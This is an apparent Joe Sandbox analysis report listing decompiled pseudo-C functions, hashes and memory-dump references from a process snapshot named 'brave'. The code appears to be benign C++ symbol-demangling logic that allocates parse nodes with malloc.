Instruction ID: 8bc12521c6770de6d8ce682a4f639fc37d332e357863023b16e7c77c98044393
Opcode Fuzzy Hash: 97bf6b18d38952cc1e7bab5118d0ebb15cef15114d82f46dfd9f4697655be916
Instruction Fuzzy Hash: E8F02842B0949555EA747E15B8003F69150BB04BF4FD84532EE4D052B1EE6CA58AC214

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715B96121 Relevance: 1.3, APIs: 1, Instructions: 91
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E00007FF77FF715B96121(void* __ebx, void* __edx, signed char __rax, void* __rbx, void* __rdx, void* __r8, signed char* _a40) {
				signed int _t150;
				signed int _t153;
				void* _t157;
				signed int _t158;
				signed int _t169;
				signed int _t180;
				signed int _t182;
				signed int _t184;
				signed int _t186;
				signed int _t188;
				signed int _t190;
				signed int _t193;
				signed int _t195;
				signed int _t197;
				signed int _t200;
				signed int _t203;
				void* _t214;
				void* _t240;
				signed char* _t245;
				long long* _t249;
				long long* _t252;
				intOrPtr* _t255;
				intOrPtr* _t258;
				intOrPtr* _t261;
				intOrPtr* _t264;
				char* _t265;
				signed char* _t266;
				intOrPtr* _t269;
				intOrPtr* _t272;
				signed char* _t275;
				intOrPtr* _t278;
				signed char* _t279;
				signed char* _t281;
				signed char* _t282;
				intOrPtr* _t321;
				intOrPtr* _t325;
				signed char* _t326;
				signed char* _t327;
				long long _t336;
				void* _t343;

				_t150 =  *(__rbx + 0x28);
				if (_t150 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x15bc26bc;
				_t321 = (_t150 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t321 + 4)) = 0;
				 *(__rbx + 0x28) = _t150 + 1;
				_a40 = _t321;
				 *_t321 = 0x2c;
				_t153 = ( *(__r8 + 2) & 0x000000ff) - 0x30;
				_t214 = _t153 - 9;
				 *((short*)(_t321 + 0x18)) = (_t153 & 0xffffff00 | _t214 < 0x00000000) & 0x000000ff;
				if (_t214 > 0) goto 0x15b96174;
				E00007FF77FF715B94E90(__rax, __rbx, __rdx, __r8, _t343);
				E00007FF77FF715B95BC0();
				_a40[0x10] = __rax;
				if (_a40[0x10] == 0) goto 0x15b95c20;
				_t157 = E00007FF77FF715B94E90(_a40, __rbx, __rdx, __r8, _t343);
				_t245 =  *(__rbx + 0x18);
				if (( *_t245 & 0x000000ff) == 0) goto 0x15b961ae;
				_t305 =  &(_t245[1]);
				 *(__rbx + 0x18) =  &(_t245[1]);
				_a40[0x1a] = ( *_t245 & 0 | ( *_t245 & 0x000000ff) == 0x00000073) & 0x000000ff;
				_t180 =  *(__rbx + 0x28);
				if (_t180 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x15b95c20;
				_t249 = (_t180 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *(__rbx + 0x28) = _t180 + 1;
				 *_t249 = 0;
				 *((intOrPtr*)(_t249 + 8)) = 0;
				 *((long long*)(_t249 + 0x10)) = "decltype(auto)";
				 *((intOrPtr*)(_t249 + 0x18)) = 0xe;
				_t182 =  *(__rbx + 0x28);
				if (_t182 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x15b95c20;
				_t252 = (_t182 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *(__rbx + 0x28) = _t182 + 1;
				 *_t252 = 0;
				 *((intOrPtr*)(_t252 + 8)) = 0;
				 *((long long*)(_t252 + 0x10)) = 0x15e43a36;
				 *((intOrPtr*)(_t252 + 0x18)) = 4;
				_t184 =  *(__rbx + 0x28);
				if (_t184 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x15bc26c9;
				_t255 = (_t184 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t255 + 4)) = 0;
				 *(__rbx + 0x28) = _t184 + 1;
				 *_t255 = 0x27;
				 *((long long*)(_t255 + 0x10)) = 0x15e45380;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 4;
				_t186 =  *(__rbx + 0x28);
				if (_t186 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x15bc26dc;
				_t258 = (_t186 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t258 + 4)) = 0;
				 *(__rbx + 0x28) = _t186 + 1;
				 *_t258 = 0x27;
				 *((long long*)(_t258 + 0x10)) = 0x15e45320;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 9;
				_t188 =  *(__rbx + 0x28);
				if (_t188 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x15bc26a9;
				_t261 = (_t188 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t261 + 4)) = 0;
				 *(__rbx + 0x28) = _t188 + 1;
				 *_t261 = 0x27;
				 *((long long*)(_t261 + 0x10)) = 0x15e453c0;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 8;
				_t190 =  *(__rbx + 0x28);
				if (_t190 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x15bc2702;
				_t264 = (_t190 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t264 + 4)) = 0;
				 *(__rbx + 0x28) = _t190 + 1;
				 *_t264 = 0x27;
				 *((long long*)(_t264 + 0x10)) = 0x15e45360;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 0xa;
				goto 0x15b95c22;
				 *_t264 =  *_t264 + _t157;
				_t158 =  *(__rbx + 0x28);
				if (_t158 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x15b95c20;
				_t325 = (_t158 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t325 + 4)) = 0;
				 *(__rbx + 0x28) = _t158 + 1;
				 *_t325 = 0x42;
				 *((intOrPtr*)(_t325 + 0x10)) = E00007FF77FF715B94E90(_t264, __rbx, _t305, __r8, _t343);
				_t265 =  *(__rbx + 0x18);
				if ( *_t265 != 0x5f) goto 0x15b95c20;
				_t266 = _t265 + 1;
				 *(__rbx + 0x18) = _t266;
				E00007FF77FF715B95BC0();
				E00007FF77FF715B94DD0();
				_a40 = _t266;
				_t193 =  *(__rbx + 0x28);
				if (_t193 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x15bc2670;
				_t269 = (_t193 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t269 + 4)) = 0;
				 *(__rbx + 0x28) = _t193 + 1;
				 *_t269 = 0x27;
				 *((long long*)(_t269 + 0x10)) = 0x15e45340;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 9;
				_t195 =  *(__rbx + 0x28);
				if (_t195 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x15bc2715;
				_t272 = (_t195 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t272 + 4)) = 0;
				 *(__rbx + 0x28) = _t195 + 1;
				 *_t272 = 0x27;
				 *((long long*)(_t272 + 0x10)) = 0x15e45400;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 0x11;
				_t197 =  *(__rbx + 0x28);
				if (_t197 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x15bc26ef;
				_t275 = (_t197 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t275 + 4)) = 0;
				 *(__rbx + 0x28) = _t197 + 1;
				 *_t275 = 0x27;
				 *((long long*)(_t275 + 0x10)) = 0x15e453a0;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 7;
				E00007FF77FF715B95BC0();
				r9d = 0;
				E00007FF77FF715B94DD0();
				_a40 = _t275;
				_t200 =  *(__rbx + 0x28);
				if (_t200 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x15bc2683;
				_t278 = (_t200 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t278 + 4)) = 0;
				 *(__rbx + 0x28) = _t200 + 1;
				 *_t278 = 0x27;
				 *((long long*)(_t278 + 0x10)) = 0x15e453e0;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 8;
				goto 0x15b95c22;
				E00007FF77FF715B96EE0(_t278, __rbx);
				_a40 = _t278;
				if (_t278 == 0) goto 0x15b95c20;
				if ( *_t278 != 0x18) goto 0x15b95d39;
				goto 0x15b95c22;
				goto 0x15b96051;
				_t279 = _t278 + 1;
				 *(__rbx + 0x18) = _t279;
				E00007FF77FF715B989F0(__rbx);
				E00007FF77FF715B94DD0();
				_a40 = _t279;
				_t326 = _t279;
				goto 0x15b95f58;
				r12d =  *(__rbx + 0x28);
				 *(__rbx + 0x18) =  &(_t326[1]);
				E00007FF77FF715B989F0(__rbx);
				if ( *( *(__rbx + 0x18)) == 0x49) goto 0x15b96584;
				 *(__rbx + 0x18) = _t326;
				_t281 = _a40;
				 *(__rbx + 0x28) = r12d;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48));
				goto 0x15b95d30;
				_t336 = _a40;
				if (_t336 == 0) goto 0x15b95c20;
				_t203 =  *(__rbx + 0x38);
				if (_t203 -  *((intOrPtr*)(__rbx + 0x3c)) >= 0) goto 0x15b95c20;
				 *((long long*)( *((intOrPtr*)(__rbx + 0x30)) + _t203 * 8)) = _t336;
				 *(__rbx + 0x38) = _t203 + 1;
				E00007FF77FF715B94DD0();
				_a40 = _t281;
				 *((intOrPtr*)(__rbx + 0x4c)) = 1;
				 *(__rbx + 0x18) = _t336 + 3;
				E00007FF77FF715B97F20(_t281, __rbx);
				_t327 = _t281;
				if (_t281 != 0) goto 0x15b96386;
				goto 0x15b95c20;
				asm("o16 nop [eax+eax]");
				_push(0x15e453e0);
				_push(_t327);
				_push(__rbx);
				_t282 =  *(__rbx + 0x18);
				if (sil == 0) goto 0x15b966c8;
				 *(__rbx + 0x18) =  &(_t282[1]);
				r10d =  *_t282 & 0x000000ff;
				if (sil != 0) goto 0x15b966d0;
				r8d = 0x45;
				asm("o16 nop [eax+eax]");
				_t169 = (r8d >> 0x1f) + r8d >> 1;
				_t240 =  *((intOrPtr*)( *((intOrPtr*)(0x15e44820 + (_t169 + _t169 * 2) * 8)))) - r10b;
				if (_t240 == 0) goto 0x15b96680;
				if (_t240 <= 0) goto 0x15b966c0;
				r8d = _t169;
				if (0 != r8d) goto 0x15b96648;
				return 0;
			}

0x7ff715b96121
0x7ff715b96127
0x7ff715b96137
0x7ff715b9613b
0x7ff715b96143
0x7ff715b96146
0x7ff715b9614b
0x7ff715b96156
0x7ff715b96159
0x7ff715b96161
0x7ff715b96165
0x7ff715b9616a
0x7ff715b96177
0x7ff715b9617c
0x7ff715b9618a
0x7ff715b96193
0x7ff715b96198
0x7ff715b961a1
0x7ff715b961a3
0x7ff715b961a7
0x7ff715b961bc
0x7ff715b961c5
0x7ff715b961cb
0x7ff715b961e2
0x7ff715b961e6
0x7ff715b961e9
0x7ff715b961f0
0x7ff715b961f7
0x7ff715b961fb
0x7ff715b96207
0x7ff715b9620d
0x7ff715b96224
0x7ff715b96228
0x7ff715b9622b
0x7ff715b96232
0x7ff715b96239
0x7ff715b9623d
0x7ff715b96249
0x7ff715b9624f
0x7ff715b96266
0x7ff715b9626a
0x7ff715b96272
0x7ff715b96275
0x7ff715b9627b
0x7ff715b9627f
0x7ff715b96288
0x7ff715b9628e
0x7ff715b962a5
0x7ff715b962a9
0x7ff715b962b1
0x7ff715b962b4
0x7ff715b962ba
0x7ff715b962be
0x7ff715b962c7
0x7ff715b962cd
0x7ff715b962e4
0x7ff715b962e8
0x7ff715b962f0
0x7ff715b962f3
0x7ff715b962f9
0x7ff715b962fd
0x7ff715b96306
0x7ff715b9630c
0x7ff715b96323
0x7ff715b96327
0x7ff715b9632f
0x7ff715b96332
0x7ff715b96338
0x7ff715b9633c
0x7ff715b96340
0x7ff715b9634e
0x7ff715b96350
0x7ff715b96356
0x7ff715b96369
0x7ff715b9636d
0x7ff715b96375
0x7ff715b96378
0x7ff715b96383
0x7ff715b96386
0x7ff715b9638d
0x7ff715b96393
0x7ff715b9639a
0x7ff715b9639e
0x7ff715b963b1
0x7ff715b963b6
0x7ff715b963c0
0x7ff715b963c6
0x7ff715b963dd
0x7ff715b963e1
0x7ff715b963e9
0x7ff715b963ec
0x7ff715b963f2
0x7ff715b963f6
0x7ff715b963ff
0x7ff715b96405
0x7ff715b9641c
0x7ff715b96420
0x7ff715b96428
0x7ff715b9642b
0x7ff715b96431
0x7ff715b96435
0x7ff715b9643e
0x7ff715b96444
0x7ff715b9645b
0x7ff715b9645f
0x7ff715b96467
0x7ff715b9646a
0x7ff715b96470
0x7ff715b96474
0x7ff715b96480
0x7ff715b96485
0x7ff715b96493
0x7ff715b96498
0x7ff715b964a2
0x7ff715b964a8
0x7ff715b964bf
0x7ff715b964c3
0x7ff715b964cb
0x7ff715b964ce
0x7ff715b964d4
0x7ff715b964d8
0x7ff715b964dc
0x7ff715b964eb
0x7ff715b964f0
0x7ff715b964f8
0x7ff715b96501
0x7ff715b96507
0x7ff715b96512
0x7ff715b96517
0x7ff715b9651e
0x7ff715b96522
0x7ff715b96537
0x7ff715b9653c
0x7ff715b96541
0x7ff715b96544
0x7ff715b96550
0x7ff715b96557
0x7ff715b9655e
0x7ff715b9656a
0x7ff715b9656c
0x7ff715b96570
0x7ff715b96575
0x7ff715b9657c
0x7ff715b9657f
0x7ff715b96584
0x7ff715b9658c
0x7ff715b96592
0x7ff715b96598
0x7ff715b965a8
0x7ff715b965b2
0x7ff715b965ba
0x7ff715b965bf
0x7ff715b965d0
0x7ff715b965da
0x7ff715b965de
0x7ff715b965e6
0x7ff715b965ec
0x7ff715b965f2
0x7ff715b965f7
0x7ff715b96600
0x7ff715b96601
0x7ff715b96602
0x7ff715b96607
0x7ff715b96614
0x7ff715b9661e
0x7ff715b96626
0x7ff715b9662d
0x7ff715b96633
0x7ff715b96642
0x7ff715b96656
0x7ff715b96666
0x7ff715b96669
0x7ff715b9666b
0x7ff715b9666d
0x7ff715b96673
0x7ff715b9667e

APIs

malloc.MSVCRT ref: 00007FF715BC2752

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: f1911072c80b76115ef9c94903d4da69b44409036a35aa95ff02e775109f09a9
Instruction ID: 0214a56034aee4caa49d7908caf69d5b75cf871211eac21d0d32a1cd27fba984
Opcode Fuzzy Hash: f1911072c80b76115ef9c94903d4da69b44409036a35aa95ff02e775109f09a9
Instruction Fuzzy Hash: 94315C73909B0581E738AF25E48136AB7A0EB44BA8F944135D6CC473B5CF7CD588C7A4

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715B95CC8 Relevance: 1.3, APIs: 1, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FF77FF715B95CC8(void* __edx, void* __rbx, void* __r8, long long _a40) {
				void* _t19;
				signed int _t20;
				signed int _t25;
				long long _t35;
				long long _t43;

				_t20 =  *(__rbx + 0x28);
				_t43 = (__edx - 0x61 << 5) + 0x15e44fe0;
				if (_t20 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x15bc2696;
				_t35 = (_t20 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t35 + 4)) = 0;
				 *(__rbx + 0x28) = _t20 + 1;
				 *((long long*)(_t35 + 0x10)) = _t43;
				 *_t35 = 0x27;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) +  *((intOrPtr*)(_t43 + 8));
				 *((long long*)(__rbx + 0x18)) = __r8 + 1;
				_t19 = E00007FF77FF715B96EE0(_t35, __rbx);
				_a40 = _t35;
				if (_t35 == 0) goto 0x15b95c20;
				_t25 =  *(__rbx + 0x38);
				if (_t25 -  *((intOrPtr*)(__rbx + 0x3c)) >= 0) goto 0x15b95c20;
				 *((long long*)( *((intOrPtr*)(__rbx + 0x30)) + _t25 * 8)) = _t35;
				 *(__rbx + 0x38) = _t25 + 1;
				return _t19;
			}

0x7ff715b95cd2
0x7ff715b95cdd
0x7ff715b95ce3
0x7ff715b95cf7
0x7ff715b95cfb
0x7ff715b95d03
0x7ff715b95d06
0x7ff715b95d0d
0x7ff715b95d13
0x7ff715b95d16
0x7ff715b95d23
0x7ff715b95d28
0x7ff715b95d33
0x7ff715b95d39
0x7ff715b95d3f
0x7ff715b95d4f
0x7ff715b95d58
0x7ff715b95d65

APIs

malloc.MSVCRT ref: 00007FF715BC2752

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: 481313779c530b80ad29adb7c36aba79e4ffeb0080f416c7aa4c906f5a1563bf
Instruction ID: 4feabedca4dbd9d89597541a010d1918cd09fda4f071639f6a200aa3d0e9f228
Opcode Fuzzy Hash: 481313779c530b80ad29adb7c36aba79e4ffeb0080f416c7aa4c906f5a1563bf
Instruction Fuzzy Hash: 8B3138B2A05B0482E7249F18F881369B7A0FB94BA9F554625C6CC073B4DF7DD188C794

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715B91670 Relevance: 1.3, APIs: 1, Instructions: 70COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF715B9172F

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: 47150c400661e288aa599803cb5707d173a492a52ae042cb663064bb588da808
Instruction ID: 20709ab50140aa107c3636a64ccaf831a82510c34f91ad03adef60e89028896d
Opcode Fuzzy Hash: 47150c400661e288aa599803cb5707d173a492a52ae042cb663064bb588da808
Instruction Fuzzy Hash: 1D212E5691DFC145EB365B3894013F9EFA1A795F54F894234DE8D06352EB6DD148C320

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715B963C0 Relevance: 1.3, APIs: 1, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00007FF77FF715B963C0(void* __rbx, signed char* _a40) {
				signed int _t77;
				signed int _t81;
				signed int _t83;
				signed int _t85;
				signed int _t88;
				signed int _t91;
				void* _t113;
				intOrPtr* _t118;
				intOrPtr* _t121;
				signed char* _t124;
				intOrPtr* _t127;
				signed char* _t128;
				signed char* _t130;
				signed char* _t131;
				signed char* _t154;
				signed char* _t155;
				long long _t162;

				_t81 =  *(__rbx + 0x28);
				if (_t81 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x15bc2670;
				_t118 = (_t81 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t118 + 4)) = 0;
				 *(__rbx + 0x28) = _t81 + 1;
				 *_t118 = 0x27;
				 *((long long*)(_t118 + 0x10)) = 0x15e45340;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 9;
				_t83 =  *(__rbx + 0x28);
				if (_t83 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x15bc2715;
				_t121 = (_t83 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t121 + 4)) = 0;
				 *(__rbx + 0x28) = _t83 + 1;
				 *_t121 = 0x27;
				 *((long long*)(_t121 + 0x10)) = 0x15e45400;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 0x11;
				_t85 =  *(__rbx + 0x28);
				if (_t85 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x15bc26ef;
				_t124 = (_t85 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t124 + 4)) = 0;
				 *(__rbx + 0x28) = _t85 + 1;
				 *_t124 = 0x27;
				 *((long long*)(_t124 + 0x10)) = 0x15e453a0;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 7;
				E00007FF77FF715B95BC0();
				r9d = 0;
				E00007FF77FF715B94DD0();
				_a40 = _t124;
				_t88 =  *(__rbx + 0x28);
				if (_t88 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x15bc2683;
				_t127 = (_t88 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t127 + 4)) = 0;
				 *(__rbx + 0x28) = _t88 + 1;
				 *_t127 = 0x27;
				 *((long long*)(_t127 + 0x10)) = 0x15e453e0;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 8;
				goto 0x15b95c22;
				E00007FF77FF715B96EE0(_t127, __rbx);
				_a40 = _t127;
				if (_t127 == 0) goto 0x15b95c20;
				if ( *_t127 != 0x18) goto 0x15b95d39;
				goto 0x15b95c22;
				goto 0x15b96051;
				_t128 = _t127 + 1;
				 *(__rbx + 0x18) = _t128;
				E00007FF77FF715B989F0(__rbx);
				E00007FF77FF715B94DD0();
				_a40 = _t128;
				_t154 = _t128;
				goto 0x15b95f58;
				r12d =  *(__rbx + 0x28);
				 *(__rbx + 0x18) =  &(_t154[1]);
				E00007FF77FF715B989F0(__rbx);
				if ( *( *(__rbx + 0x18)) == 0x49) goto 0x15b96584;
				 *(__rbx + 0x18) = _t154;
				_t130 = _a40;
				 *(__rbx + 0x28) = r12d;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48));
				goto 0x15b95d30;
				_t162 = _a40;
				if (_t162 == 0) goto 0x15b95c20;
				_t91 =  *(__rbx + 0x38);
				if (_t91 -  *((intOrPtr*)(__rbx + 0x3c)) >= 0) goto 0x15b95c20;
				 *((long long*)( *((intOrPtr*)(__rbx + 0x30)) + _t91 * 8)) = _t162;
				 *(__rbx + 0x38) = _t91 + 1;
				E00007FF77FF715B94DD0();
				_a40 = _t130;
				 *((intOrPtr*)(__rbx + 0x4c)) = 1;
				 *(__rbx + 0x18) = _t162 + 3;
				E00007FF77FF715B97F20(_t130, __rbx);
				_t155 = _t130;
				if (_t130 != 0) goto 0x15b96386;
				goto 0x15b95c20;
				asm("o16 nop [eax+eax]");
				_push(0x15e453e0);
				_push(_t155);
				_push(__rbx);
				_t131 =  *(__rbx + 0x18);
				if (sil == 0) goto 0x15b966c8;
				 *(__rbx + 0x18) =  &(_t131[1]);
				r10d =  *_t131 & 0x000000ff;
				if (sil != 0) goto 0x15b966d0;
				r8d = 0x45;
				asm("o16 nop [eax+eax]");
				_t77 = (r8d >> 0x1f) + r8d >> 1;
				_t113 =  *((intOrPtr*)( *((intOrPtr*)(0x15e44820 + (_t77 + _t77 * 2) * 8)))) - r10b;
				if (_t113 == 0) goto 0x15b96680;
				if (_t113 <= 0) goto 0x15b966c0;
				r8d = _t77;
				if (0 != r8d) goto 0x15b96648;
				return 0;
			}

0x7ff715b963c0
0x7ff715b963c6
0x7ff715b963dd
0x7ff715b963e1
0x7ff715b963e9
0x7ff715b963ec
0x7ff715b963f2
0x7ff715b963f6
0x7ff715b963ff
0x7ff715b96405
0x7ff715b9641c
0x7ff715b96420
0x7ff715b96428
0x7ff715b9642b
0x7ff715b96431
0x7ff715b96435
0x7ff715b9643e
0x7ff715b96444
0x7ff715b9645b
0x7ff715b9645f
0x7ff715b96467
0x7ff715b9646a
0x7ff715b96470
0x7ff715b96474
0x7ff715b96480
0x7ff715b96485
0x7ff715b96493
0x7ff715b96498
0x7ff715b964a2
0x7ff715b964a8
0x7ff715b964bf
0x7ff715b964c3
0x7ff715b964cb
0x7ff715b964ce
0x7ff715b964d4
0x7ff715b964d8
0x7ff715b964dc
0x7ff715b964eb
0x7ff715b964f0
0x7ff715b964f8
0x7ff715b96501
0x7ff715b96507
0x7ff715b96512
0x7ff715b96517
0x7ff715b9651e
0x7ff715b96522
0x7ff715b96537
0x7ff715b9653c
0x7ff715b96541
0x7ff715b96544
0x7ff715b96550
0x7ff715b96557
0x7ff715b9655e
0x7ff715b9656a
0x7ff715b9656c
0x7ff715b96570
0x7ff715b96575
0x7ff715b9657c
0x7ff715b9657f
0x7ff715b96584
0x7ff715b9658c
0x7ff715b96592
0x7ff715b96598
0x7ff715b965a8
0x7ff715b965b2
0x7ff715b965ba
0x7ff715b965bf
0x7ff715b965d0
0x7ff715b965da
0x7ff715b965de
0x7ff715b965e6
0x7ff715b965ec
0x7ff715b965f2
0x7ff715b965f7
0x7ff715b96600
0x7ff715b96601
0x7ff715b96602
0x7ff715b96607
0x7ff715b96614
0x7ff715b9661e
0x7ff715b96626
0x7ff715b9662d
0x7ff715b96633
0x7ff715b96642
0x7ff715b96656
0x7ff715b96666
0x7ff715b96669
0x7ff715b9666b
0x7ff715b9666d
0x7ff715b96673
0x7ff715b9667e

APIs

malloc.MSVCRT ref: 00007FF715BC2752

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
